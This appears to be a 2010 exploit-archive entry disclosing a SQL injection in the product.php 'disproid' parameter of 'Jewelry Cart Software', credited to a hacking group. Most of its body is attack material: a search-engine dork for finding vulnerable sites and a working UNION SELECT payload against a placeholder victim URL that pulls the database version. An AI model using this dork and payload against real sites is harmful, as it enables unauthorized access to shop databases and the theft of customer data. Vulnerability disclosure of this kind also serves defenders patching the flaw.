Jewelry Cart Software (product.php) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Jewelry Cart Software (product.php) SQL Injection Vulnerability
# Published : 2010-03-21
# Author : Asyraf
# Previous Title : Adult Video Site Script Multiple Vulnerabilities
# Next Title : Woltlab Burning Board Lite Addon (lexikon.php) SQL Injection Vulnerability

**************************************************************

# Name : Jewelry Cart Software SQL Injection (product.php) ::-
# Author : Asyraf (Mycrypto Security Force) r0x~!!
# Date : 20/3/2010
# Language : PHP
# Script : Jewelry Cart Software
# Shout : hMSecurity,n3wb0rn,TBD Security

# Dork : Powered by Jewelry Cart Software
          product.php?disproid=

# Vulnerability : product.php?disproid=[ANY VALUE]

# Exploited : http://www.victim.com/product.php?disproid=53+AND+1=2+UNION+SELECT+0,1,version%28%29,3,4--

***************************************************************